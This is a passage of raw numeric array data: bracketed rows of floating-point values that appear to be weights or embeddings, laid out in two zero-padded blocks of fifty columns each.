0.270854, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.193564, 1.44523, 0.659922, 1.59422, 1.12143, 0.154426, -0.32065, 1.95374, 1.13126, 0.748786, 0.111294, 1.05834, 0.17786, 0.173992, 0.591047, -0.1564, 1.00194, -0.55098, 0.421743, 0.474903, 0.232618, 0.767089, -0.087252, -0.0644955, 0.00317547, 0.504545, 0.866105, -0.129073, -0.667322, 2.2109, -0.928405, -0.775013, 0.648402, 1.99629, -2.22688, 0.200229, -0.451636, -1.15499, 2.49395, -0.215081, -0.355066, 0.724267, 1.15448, 0.598434, -0.722057, 0.355473, -0.15744, 0.482168, 1.85246, -0.133023, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.153071, 0.0185324, 0.496609, -0.176242, 0.13252, -0.368707, -0.374178, -0.666281, 0.784158, 0.0972886, -0.0192852, 0.30612, -0.832663, -0.318517, 0.159466, 0.17836, 0.333991, 0.436896, -1.07546, 0.288074, -0.149633, 0.578693, -0.0163636, -0.0300377, -0.00523577, 0.171676, 0.270649, 1.19062, -0.146285, 1.77465, 0.333948, 0.701942, -0.340734, -0.182913, -0.423262, 0.406886, 0.346195, 0.278865, -0.0925859, -1.19779, 0.125343, -0.109969, -0.127216, 0.150708, 0.537367, 0.201625, 0.334242, 0.026659, -0.11661, 0.714312, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.147091, -0.920817, -0.670497, 0.276299, -0.0595598, -1.80043, 0.48221, 1.18207, 0.163645, 1.15554, 0.208565, 0.123033, 0.0145719, 0.483299, -0.370696, 0.116619, -0.202445, -3.19707, 4.6203, -0.380048, 0.0601541, 0.17444, 0.536912, -1.04387, 0.0414812, 0.118798, 0.200287, 0.321081, -0.868847, 0.420665, -0.00396356, 0.496525, 0.265315, 0.55163, 0.137533, -0.0918724, -0.642299, 0.144151, 0.335251, 0.026644, -0.39161, -0.306894, -2.18482, -0.469382, 0.155484, 0.329642, 0.0499698, -2.67322, 1.09758, -0.759099, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.52024, -0.252208, 0.610368, 0.869977, -0.105383, -0.588515, -0.366213, 0.30223, 0.101059, -0.278991, -0.307602, 0.0397712, 0.149832, 0.543451, -0.0666054, 0.453521, 0.0148984, -0.455494, 1.27761, 0.0723849, -2.01327, 0.253964, 0.530549, 0.262947, -0.00402599, 0.844994, 0.487316, -1.29872, 0.3786, 1.7897, -0.162888, 1.22249, 1.73516, -0.418335, 0.00139107, -0.2073, 0.21481, -0.580094, -0.444339, -0.524151, -0.0877953, -1.35841, -2.08125, -0.287998, 0.265565, -0.0688904, -0.614191, -0.474938, 0.649689, 0.0298627, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00337957, 0.00358123, -0.0523126, -0.0435683, -0.0121571, 0.0389191, -0.0244973, 0.00833114, -0.00309726, -0.0167869, -0.00753699, -0.0139463, -0.0515684, -0.0134991, -0.0500966, 0.0318874, 0.01181, -0.0374396, -0.00661598, -0.047146, 0.0211228, 0.0419343, -0.0287218, -0.0241813, -0.00216306, -0.0163612, -0.0027264, -0.00233119, -0.0456672, 0.0397102, 0.0369856, -0.04383, -0.0307999, -0.0311257, 0.00459582, -0.0222941, -0.0466089, -0.0410443, 0.00114919, -0.0275192, 0.0201718, 0.0173984, -0.0135623, -0.0421613, 0.0354616, -0.046678, -0.0230274, 0.0185662, -0.00593874, -0.0432285, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0394096, 0.55121, -0.0374195, 2.12755, 0.0327126, -0.0055392, 0.131943, 1.44832, 0.398095, 1.15941, -0.0985198, -0.210324, 0.0354951, 0.0111342, 0.0401923, 0.0671328, -0.0669259, -0.197069, -0.10793, 0.115893, 0.193412, -0.186414, -0.0141833, -0.109271, -0.000462505, 0.408058, 0.207189, 0.0120423, -0.0833266, 0.0256778, -3.82905, -0.057105, 1.00422, 2.08877, -1.69096, 0.0373892, 0.0479907, 0.0536657, 2.58227, -0.0178714, -0.126188, -0.046956, -0.0208863, 0.645768, 0.0434935, 0.652171, 0.0188168, 0.134778, 1.72043, -0.0939978, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.544524, 0.0611729, -0.100278, -0.416678, 0.0386408, -0.143012, 0.205194, -0.202811, -0.143623, 0.722468, -0.272663, 0.0566484, -0.464974, -0.0557419, -0.935183, -0.487267, 0.0660513, -1.14682, 0.751996, 0.776297, 0.999378, 0.415307, -0.0259069, 0.174351, 0.010856, -0.058101, -0.0898991, -0.21022, -0.649379, -0.443088, 0.0840818, 0.0259013, 0.261792, 0.433581, -0.318584, -0.649173, 0.692869, -0.159344, 0.841141, 0.0955951, -0.289821, -0.250892, -1.68588, 0.152792, 0.314845, 0.503401, -0.0960577, -0.56229, 0.601555, -0.00509082, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0672764, -0.478893, 0.834231, -0.272691, 0.120782, -2.3506, 0.405975, -0.926539, 0.469639, 0.17459, 0.0400554, 0.296408, -0.23935, 1.19698, 0.114479, 0.118828, -0.726833, -0.384486, -0.630676, -0.802355, -1.88252, 1.50989, -0.627703, 0.312084, 0.00842059, -0.747298, 0.242916, -0.417442, -0.0627678, 0.435047, -0.435611, 1.01109, 1.16521, -0.481582, 0.039355, -0.43607, 0.0440735, -0.846213, 0.495375, 0.215144, 0.0238547, -0.201547, -2.21498, -0.303679, 0.63545, -0.230395, 0.704447, 0.817042, 1.36926, 0.0497661, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.92864, -0.0805053, 0.0640302, -0.263019, 0.16609, -1.66211, -0.132093, -1.32705, 0.166086, -0.129865, -0.334594, 0.0661127, 0.633007, 0.0379516, -0.387032, -0.0128015, 1.01307, -0.384665, 0.00750208, 0.483827, -0.0300168, 0.97097, -0.516422, -1.18488e-05, -0.0239806, -0.0991065, -0.451664, -0.508915, 0.086945, -1.37244, -0.0566116, 0.845539, -0.0248938, 0.0752465, 0.283255, 0.0503731, -0.635955, -0.633855, -0.463081, 0.366167, -0.443574, -0.303306, -0.455209, -0.437595, 0.477966, 0.434585, -0.127842, -1.30902, 0.176107, 0.103521, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0876844, -0.0394447, 0.0651309, 1.97424, -0.247538, -0.17824, 0.370758, 0.438517, -0.052765, 0.0938755, -1.62234, 0.372372, 0.652717, -0.338896, 0.685237, -0.0467079, 0.0935516, -0.501777, -0.0820838, 0.179616, 0.103024, 0.0365015, -0.194073, 0.534099, -0.0251719, -0.763432, 0.116582, -0.643583, -0.0173197, 0.690473, -0.685065, -0.240548, 0.416865, 2.45208, -1.0554, 0.306108, 0.125049, 0.21656, 2.45733, -0.0456824, -1.41824, 0.389472, -0.467001, 0.301731, 0.858388, 0.901823, -0.427594, 0.684289, 0.0118938, -0.203476, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.136948, 0.00949599, -0.138863, 0.0145009, 0.0200551, -0.240808, -0.123084, 0.0325245, 0.0788718, 0.0204245, -0.136803, -0.0574912, 0.0101873, 0.0759982, -0.146138, -0.0910074, 0.0573273, -0.065921, 0.147955, 0.0703083, -0.0661596, 0.105562, -0.0755332, -0.0848411, -0.00475373, 0.0660235, 0.078352, -0.0748353, -0.136368, 0.0435885, -0.147388, 0.0636972, 0.0917308, 0.00161574, -0.112873, -0.144428, -0.057471, 0.0699405, 0.0593641, -0.169008, -0.0948852, -0.0303798, -0.0645098, 0.0536553, 0.0368449, 0.0618894, 0.0667266, 0.0957317, 0.0667804, -0.116074, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.469926, 0.408884, 0.185463, 0.868883, -0.947657, -8.5792, -3.50731, 1.1403, 0.0518583, 0.313976, 0.431151, 1.84579, 0.244769, -0.017983, -0.112137, 1.09834, 0.479314, -0.432428, 1.70457, -0.68671, -0.269506, -0.330778, -0.658605, -0.224633, 0.0204342, 0.521441, 0.913928, 0.791134, -0.732973, 0.101704, -0.623539, -0.717065, 0.727761, -0.728795, -1.7978, 1.08374, 0.666371, 0.0765811, 0.186647, -0.17136, 0.621338, -0.358866, 0.282117, -0.137108, -0.210127, 0.360947, 0.40046, 0.437648, 0.884444, -1.52199, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.517693, -0.188861, -0.110653, 0.610181, 0.357651, 1.10959, 0.213089, 0.138339, -0.598133, 0.0333181, -0.286477, 0.0409145, -0.89652, 0.563481, 0.105493, -1.18442, -1.16413, 0.442435, -1.35846, 0.599078, -0.0404175, 1.98201, -2.90362, 0.623524, 0.00986964, 0.491189, -0.393, 0.394516, -0.509288, -1.0722, 0.0456513, -0.4905, -0.357225, -0.429378, 0.169915, 0.153339, 0.35338, 0.976487, -0.693323, -0.723389, -0.232865, 0.0909224, 0.522503, -0.499166, -0.439303, -0.179512, 0.507023, 0.446633, 0.0971412, -0.423109, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.164987, -0.0833527, 0.242473, 0.850368, -0.47946, 0.582513, 0.982952, 1.07879, 0.726892, 0.529269, -0.418537, -0.780971, 0.365121, 0.717431, 0.265642, -0.0855164, -0.0624654, -0.0433837, -0.474597, 0.263688, 0.0366676, 1.05476, -0.184634, 0.342488, -0.00713987, 0.795176, 1.19533, 0.541726, 0.609728, 0.173506, -2.57625, -1.21161, 1.0144, 1.15735, -1.40846, 0.810331, 0.129969, 0.532479, 2.04186, 0.137569, -0.164729, -0.530415, 0.225923, 0.652957, -0.165551, 0.686438, 0.199711, 0.820853, 1.6985, -0.924089, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.396691, -0.0966309, 0.524738, 0.290395, -0.141133, -1.89133, -1.61072, 0.125004, -0.460584, 0.990398, 0.149935, -0.403642, -0.208745, -0.396032, -1.32516, -0.229743, -0.785902, 0.120239, -0.47498, 0.598314, -2.38218, 1.42707, 0.247473, -0.141231, -0.0268979, 0.271052, -0.950764, -0.488094, 0.789393, -0.00625228, -0.123165, 0.110131, -0.170346, 0.473505, -0.0567374, -0.198819, -0.0413459, 0.335743, 0.22965, -0.105583, -0.342492, 0.0980278, -0.732316, 0.0609348, 0.604883, 0.581011, -1.76308, -0.742039, -0.16962, -0.581466, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.24508, 0.562699, 0.260105, -0.236235, -0.367931, -0.226799, 0.239146, 0.663539, -0.859104, -0.828027, -0.114967, 0.452936, -0.0238205, 0.482179, 0.825268, 0.161358, -0.0338258, 0.56836, -1.88275, 0.745016, -0.0119559, -1.04783, 1.10075, 0.331847, -0.0344808, 0.238694, 0.0153113, 0.114493, 0.354661, 0.453307, -0.166063, -0.710224, -0.656524, -0.207768, -0.261955, 0.324339, -0.0728687, 0.726105, -0.0455242, -1.26913, -0.632906, 0.417452, 1.43878, -0.39033, -0.00654117, -1.00863, 0.0509374, 0.646698, -0.159838, -0.231139, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.348713, 0.0989373, 0.176364, 1.00371, 0.217003, 0.244686, 0.057497, 0.56687, -0.348277, 2.12931, 0.262162, -0.51769, -0.112407, -0.309114, 0.119633, 0.283863, 0.379286, 0.0909194, -0.0207329, 0.666918, 0.288551, -0.0461617, -0.156872, 0.043032, -0.023566, 0.368011, 0.0401163, 0.213342, 0.0291498, 0.191933, -0.3804, 0.064906, 0.140289, 1.38621, -0.387508, -0.434461, -0.0981892, -0.613056, 0.617226, 0.171985, -0.266164, 0.0484587, 0.331019, 0.321773, 0.507049, 0.895311, -0.150759, -0.60238, -0.142155, 0.160951, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1842, 0.0344, -0.1151, 0.1847, -0.1372, -0.1893, -0.7485, 0.5757, -0.01331, 0.1437, 0.133, -0.2244, 0.3022, 0.04086, -0.3396, 0.06494, 0.0732, -0.4592, 0.4749, 0.3772, -1.114, -0.572, 0.04993, -0.2542, -0.02524, 0.2257, 0.1499, -0.1552, -0.0172, 0.9907, 0.07837, -0.1442, -0.1791, -0.34, 0.2123, 0.008255, 0.0684, 0.588, -0.1707, -0.5435, 0.11896, -0.4958, -1.667, -0.324, -0.01543, 0.5103, 0.0941, 0.3374, 0.3958, -0.2235], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01717, -0.0345, -0.00869, 0.03818, 0.02141, 0.04218, 0.02155, -0.03363, -0.04742, 0.02135, 0.00994, 0.02777, 0.00493, -0.04272, -0.024, -0.03223, 0.0134, -0.04236, -0.0401, -0.01746, -0.0423, 0.014656, -0.03137, 0.03848, 0.04642, 0.02182, 0.01596, 0.004173, 0.0174, -0.01785, -0.0479, -0.004086, -0.04184, 0.001454, -0.05087, -0.04633, 0.02142, -0.05328, -0.0573, 0.02898, -0.03293, -0.03198, -0.0334, -0.0227, -0.01547, -0.0484, -0.007114, -0.0371, 0.01964, -0.0352], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0698, -0.00409, -0.278, 0.2588, 0.1558, -1.331, -1.312, -0.893, 0.1954, 0.384, 0.04272, -0.5396, 0.0813, 0.4014, -0.2744, 0.368, -0.7607, -1.294, 1.471, 0.0978, -0.79, -0.5347, 0.007206, -0.5537, -0.02199, 0.2654, 0.204, 0.4092, -0.8594, 0.1875, 0.2424, -0.11285, 0.5264, -0.4639, -0.3643, 0.05368, 0.4436, 0.9194, 0.64, -0.879, -0.9785, -0.03918, 0.1421, -0.7983, -1.767, 0.153, 0.261, -1.877, -0.5923, 0.4407], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.795, -0.363, -0.1719, 0.0976, 0.02715, -0.4153, -0.09247, -0.6025, -0.321, 0.4353, 0.528, -0.4155, -0.1958, -0.03726, -1.008, 0.1334, 0.2484, -1.698, 2.012, -0.707, 1.155, 0.527, -0.1694, 0.3635, -0.03018, 0.7705, -0.3774, -0.013725, -0.4878, 0.2263, 0.3835, 0.282, -0.4768, 0.00903, -0.10144, -0.621, 0.004456, -0.1442, -0.1324, 0.3567, 0.05804, -0.4553, -0.707, -0.4053, -0.0423, 0.5967, -0.2177, -0.1289, -0.1266, -0.1729], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0585, 0.007084, 0.268, -0.006596, 0.316, -0.05377, 0.3657, 0.03604, -0.04745, -0.3713, 0.1539, -0.2157, 0.1462, 0.4146, -0.05222, -0.12213, -0.2384, -1.1, -3.205, -0.439, -0.2605, -0.2693, -0.04092, 0.3691, -0.04352, -0.3445, -0.371, -0.369, -0.03485, 0.3838, -0.104, -0.346, 0.5254, 0.1403, 0.1561, 0.573, -0.01642, -0.1343, -0.1335, 0.009895, -0.218, -0.1565, -0.6396, 0.6675, 0.415, 0.324, -0.066, 0.859, -0.6196, -0.01118], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.03326, -0.08105, -0.534, 0.668, -0.8125, 1.297, 1.269, 0.7046, 0.1178, 0.03143, 0.346, -1.276, 0.2593, 0.756, 0.559, -0.1236, -0.317, -1.39, -2.33, 0.6846, 0.0419, -0.6416, -0.02202, -0.815, 0.03625, -0.3328, -0.1742, -0.664, 0.2155, 0.4146, -0.3162, 0.411, 0.6562, 1.717, -0.3503, 0.07434, 0.3743, 0.2393, 1.45, -0.3213, 0.2451, -0.718, -1.787, 1.142, 0.2827, 0.795, -0.2998, -0.773, -0.0412, 0.82], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2083, 0.835, -0.1512, 1.151, 0.2216, 0.1082, 0.0651, 0.1455, 0.632, 0.1089, 0.5083, -0.269, -0.1982, 0.1724, 0.326, 0.06128, -0.6353, -0.4355, 0.591, 0.09235, -0.00991, -0.2275, -0.391, 0.04318, -0.04575, 0.2002, 0.1274, -0.327, 0.5947, -0.4128, 0.1785, 0.005787, -0.661, 0.01032, -0.11035, 0.542, 0.1589, 0.4666, -0.2703, -0.2239, -0.03134, -0.2382, -0.4, 0.729, 0.10986, -0.519, 0.2805, 0.3657, 1.363, -0.1381], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.105, 0.2788, -1.35, -0.0696, 0.755, 2.578, 0.08655, 0.511, -0.05777, -0.10406, -0.4238, -0.2139, 0.02632, 3.168, 0.7056, 0.1565, 0.1157, 0.8896, 0.04855, -0.3293, -7.395, -0.588, 0.6797, 0.404, 0.03534, -1.802, -0.3958, 0.1975, -0.2886, -0.8306, 0.318, -0.818, -0.743, 0.3684, 0.02339, 0.4077, -1.042, 0.484, 0.0829, 0.3572, -1.502, -0.1963, 0.7256, 0.2228, 0.034, -0.584, 0.09314, 0.3281, 0.823, 0.05106], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01807, -0.121, -0.1934, 0.858, -1.76, -0.1458, 2.568, 0.7827, 0.4504, -0.09827, -0.1247, -0.7266, -0.7324, 0.1536, -0.03268, 0.086, -0.57, 0.394, 0.11743, 0.2512, 0.8457, 0.8477, 0.4211, 0.573, 0.0251, -0.1708, -0.1277, 0.008316, 0.0788, 2.576, -1.3, 0.691, -3.324, -1.357, -2.201, 0.3928, 0.373, 0.2803, -0.61, 0.1031, -0.2776, 1.429, 0.4731, -0.674, 1.211, -1.3545, 0.102, -1.702, 1.088, -0.8125], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2346, -0.00865, 0.0404, 0.2515, 0.656, -0.1879, -0.628, 0.518, -0.3967, -0.7896, 0.1755, -0.392, 0.2778, -1.058, 0.526, 0.5107, -0.106, -1.676, 